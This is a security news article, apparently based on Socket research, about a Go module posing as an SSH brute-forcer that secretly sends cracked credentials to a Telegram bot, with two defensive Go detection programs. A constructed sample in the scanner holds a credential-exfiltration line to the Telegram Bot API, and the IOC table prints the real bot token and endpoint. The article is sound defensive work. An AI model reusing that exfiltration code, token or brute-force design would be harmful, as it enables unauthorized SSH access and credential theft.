Rogue Go Module Doubles as Fast SSH Brute-Forcer, Sends Stolen Passwords via Telegram

Socket’s Threat Research Team has uncovered a deceptive Go module named golang-random-ip-ssh-bruteforce, which masquerades as an efficient SSH brute-forcing tool but secretly exfiltrates stolen credentials to its creator.

Published on June 24, 2022, the package was still available in the Go module ecosystem and on GitHub at the time of the report, even though Socket has petitioned for its removal and for suspension of the associated accounts.

The module operates by generating random IPv4 addresses, probing for open TCP port 22 with a brief timeout, and launching concurrent authentication attempts using a hardcoded local wordlist of weak username-password pairs.

Discovery of Malicious Package

Upon the first successful login, it transmits the target IP, username, and password to a predefined Telegram bot via an HTTPS request, effectively handing over any initial access to the threat actor.

Telegram Bot Info confirms the exfiltration bot is active

This design leverages unwitting users to perform distributed scanning and guessing, offloading the computational and legal risks while funneling successes to a single point of control.

The code sets HostKeyCallback to ssh.InsecureIgnoreHostKey() from golang.org/x/crypto/ssh, which disables verification of the server’s host key; that is what lets it open sessions to arbitrary, never-before-seen hosts with no security check at all, and it exits immediately after the first exfiltration to keep its footprint small.

The embedded wordlist focuses on common defaults like “root” and “admin” paired with entries such as “toor,” “raspberry,” “dietpi,” and “alpine,” targeting exposed IoT devices, single-board computers, and poorly configured Linux hosts.

This design keeps network noise low, generates no traffic to the actor’s infrastructure until there is a hit, and preserves plausible deniability, since the module looks like a legitimate offensive security tool.
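The traits described above (a hard-coded Telegram Bot API URL carrying the bot token and chat_id, and an SSH client configured to ignore host keys) are easy to flag statically. The Go program below is an added example written for this article; it is not code from the module, from Socket, or from any product. It scans Go source text for those three patterns and masks the secret half of any token before printing, so the finding itself does not re-leak the credential. The sample it scans is a constructed fragment in the module’s shape with a made-up token and chat_id, and the rule names are arbitrary.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one suspicious pattern located in Go source text.
type Finding struct {
	Rule string // short rule identifier (names chosen for this example)
	Line int    // 1-based line number in the scanned text
	Text string // the matching substring
}

// Each rule targets a trait the article attributes to the module: host-key
// verification disabled, a Telegram Bot API token embedded in a URL, and a
// hard-coded destination chat_id.
var rules = []struct {
	name string
	re   *regexp.Regexp
}{
	{"ssh-hostkey-ignored", regexp.MustCompile(`\bssh\.InsecureIgnoreHostKey\s*\(`)},
	{"telegram-bot-token", regexp.MustCompile(`api\.telegram\.org/bot\d{6,}:[A-Za-z0-9_-]{30,}`)},
	{"telegram-chat-id", regexp.MustCompile(`chat_id=\d+`)},
}

// ScanSource returns every rule hit in src, in line order.
func ScanSource(src string) []Finding {
	var out []Finding
	for i, line := range strings.Split(src, "\n") {
		for _, r := range rules {
			if m := r.re.FindString(line); m != "" {
				out = append(out, Finding{Rule: r.name, Line: i + 1, Text: m})
			}
		}
	}
	return out
}

// RedactToken keeps the numeric bot id and the first four secret characters so a
// finding can be logged or ticketed without re-exposing the credential.
func RedactToken(s string) string {
	re := regexp.MustCompile(`(bot\d+:[A-Za-z0-9_-]{4})[A-Za-z0-9_-]*`)
	return re.ReplaceAllString(s, "${1}****")
}

// sampleSource is a constructed fragment in the shape the article describes; it is
// not the real module's code, and the token and chat_id are made up.
const sampleSource = `package main

func attempt(addr, user, pass string) {
	cfg := &ssh.ClientConfig{
		User:            user,
		Auth:            []ssh.AuthMethod{ssh.Password(pass)},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(),
		Timeout:         2 * time.Second,
	}
	_ = cfg
}

func report(ip, user, pass string) {
	const api = "https://api.telegram.org/bot1234567890:AAExampleTokenNotRealXXXXXXXXXXXXX/sendMessage?chat_id=1000000000&parse_mode=HTML&text="
	http.Get(api + url.QueryEscape(ip+" "+user+" "+pass))
}
`

func main() {
	for _, f := range ScanSource(sampleSource) {
		fmt.Printf("line %2d  %-21s %s\n", f.Line, f.Rule, RedactToken(f.Text))
	}
}
```

Pointed at a vendored module tree with a file walk, the token rule doubles as a leaked-credential check: a Bot API token in source is both a sign of exfiltration and a secret that should be reported to Telegram, which is why the finding is masked before it reaches a log or ticket.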

Threat Actor Profile

The perpetrator, operating under the GitHub alias IllDieAnyway (also known as G3TT), is assessed with high confidence as a Russian-speaking individual based on Russian-language artifacts in repositories, including full READMEs and VKontakte-specific tooling like vk_inviter.

Threat actor’s GitHub profile

Their portfolio includes other offensive utilities such as port scanners, a phpMyAdmin brute-forcer with Telegram callbacks, and the Selica-C2 framework, suggesting potential for building botnets from harvested SSH accesses.

While no direct code linkage exists between this module and Selica-C2, the tools could synergize for post-exploitation activities like payload deployment or ransomware staging.

Running this package exposes operators to significant risks: legal liability for unauthorized scanning, ISP blacklisting, and the irony of surrendering every discovery to the actor through the active Telegram bot @sshZXC_bot, which delivers the data to chat ID 1159678884, controlled by the user @io_ping.

In the criminal underground, such credentials are valuable for espionage, cryptomining, or pivoting into networks, amplifying the module’s impact beyond individual runs.

To mitigate, organizations should require code review of third-party offensive tooling before it runs on their hosts, monitor egress to messaging APIs such as api.telegram.org, and deploy detections for Telegram Bot API URLs (a bot token embedded in the request path) and for SSH clients that disable host-key verification.
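For the egress side of that advice, the Go program below is an added example, not part of Socket’s report or of any product. It reads flow records in an assumed CSV layout (timestamp,src,dst,dport,sni), counts how many distinct port-22 destinations each source host reaches inside one five-minute window, and notes TLS sessions whose SNI is api.telegram.org; a host that shows both is exactly what a machine running this module looks like from the network. The records are constructed, and the threshold, window and alert names are assumptions to tune per environment.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
	"time"
)

// Event is one outbound flow in the assumed CSV layout "timestamp,src,dst,dport,sni".
type Event struct {
	TS            time.Time
	Src, Dst, SNI string // SNI is the TLS server name; empty for non-TLS flows such as SSH
	DPort         int
}

func ParseLine(line string) (Event, error) {
	f := strings.Split(strings.TrimSpace(line), ",")
	if len(f) != 5 {
		return Event{}, fmt.Errorf("want 5 fields, got %d: %q", len(f), line)
	}
	ts, errT := time.Parse(time.RFC3339, f[0])
	port, errP := strconv.Atoi(f[3])
	if errT != nil || errP != nil { // malformed input is an error, not silently dropped
		return Event{}, fmt.Errorf("bad timestamp or port in %q", line)
	}
	return Event{TS: ts, Src: f[1], Dst: f[2], DPort: port, SNI: f[4]}, nil
}

type Verdict struct {
	SSHTargets   int    // most distinct port-22 destinations in any one window
	TelegramHits int    // TLS flows whose SNI is api.telegram.org
	Alert        string // empty when nothing fired
}

const fanoutThreshold = 20           // distinct SSH targets per window; tune per fleet
const fanoutWindow = 5 * time.Minute // tumbling window for the fan-out count

// Analyze combines the two signals a host running the module would show: broad
// outbound SSH probing and egress to the Telegram Bot API.
func Analyze(lines []string) (map[string]Verdict, error) {
	type bucket struct{ src, win string }
	targets := map[bucket]map[string]bool{} // (src, window) -> distinct SSH dsts
	best, tg, hosts := map[string]int{}, map[string]int{}, map[string]bool{}
	for _, l := range lines {
		ev, err := ParseLine(l)
		if err != nil {
			return nil, err
		}
		hosts[ev.Src] = true
		switch {
		case ev.DPort == 22:
			b := bucket{ev.Src, ev.TS.Truncate(fanoutWindow).Format(time.RFC3339)}
			if targets[b] == nil {
				targets[b] = map[string]bool{}
			}
			targets[b][ev.Dst] = true
			if len(targets[b]) > best[ev.Src] {
				best[ev.Src] = len(targets[b])
			}
		case ev.DPort == 443 && ev.SNI == "api.telegram.org":
			tg[ev.Src]++
		}
	}
	out := map[string]Verdict{}
	for src := range hosts {
		v := Verdict{SSHTargets: best[src], TelegramHits: tg[src]}
		switch {
		case v.SSHTargets >= fanoutThreshold && v.TelegramHits > 0:
			v.Alert = "ssh-scan-with-telegram-exfil" // the module's full behaviour
		case v.SSHTargets >= fanoutThreshold:
			v.Alert = "ssh-fanout"
		case v.TelegramHits > 0:
			v.Alert = "messaging-api-egress"
		}
		out[src] = v
	}
	return out, nil
}

// SampleLogs returns constructed records: 10.0.0.5 mimics a host running the module
// (25 SSH probes to distinct TEST-NET-2 addresses, then a Telegram call), 10.0.0.9
// only reaches Telegram, and 10.0.0.7 makes one ordinary SSH hop.
func SampleLogs() []string {
	base := time.Date(2025, 1, 10, 9, 0, 0, 0, time.UTC)
	var lines []string
	for i := 0; i < 25; i++ {
		ts := base.Add(time.Duration(i*3) * time.Second).Format(time.RFC3339)
		lines = append(lines, fmt.Sprintf("%s,10.0.0.5,198.51.100.%d,22,", ts, 10+i))
	}
	return append(lines,
		base.Add(80*time.Second).Format(time.RFC3339)+",10.0.0.5,203.0.113.20,443,api.telegram.org",
		base.Format(time.RFC3339)+",10.0.0.9,203.0.113.20,443,api.telegram.org",
		base.Format(time.RFC3339)+",10.0.0.7,192.0.2.10,22,",
	)
}

func main() {
	verdicts, err := Analyze(SampleLogs())
	fmt.Printf("%+v %v\n", verdicts, err)
}
```

The fan-out count uses a tumbling window keyed on the truncated timestamp, which is cheap to run over a SIEM export; a scan that straddles a window boundary is split across two buckets, so on a real fleet set the threshold with that in mind or switch to a sliding window. The Telegram check keys on SNI rather than destination IP because the Bot API sits behind shared Telegram address space.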

According to the report, Socket’s AI-driven tools, including its GitHub App and CLI, provide proactive defenses by scanning for risky behaviors in dependencies.

This incident highlights an emerging trend of weaponized open-source utilities that exploit trust in supply chains, urging developers to verify packages thoroughly and adopt layered security controls to prevent inadvertent participation in malicious campaigns.

Indicators of Compromise (IOCs)

Category                Details
Malicious Go Package    golang-random-ip-ssh-bruteforce
Threat Actor (GitHub)   IllDieAnyway
Exfiltration Endpoint   https://api.telegram.org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884&parse_mode=HTML&text=
Telegram Identifiers    Bot token: 5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY
                        Bot name and handle: ssh_bot (@sshZXC_bot)
                        Destination chat_id: 1159678884
                        Destination user: Gett (@io_ping)

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.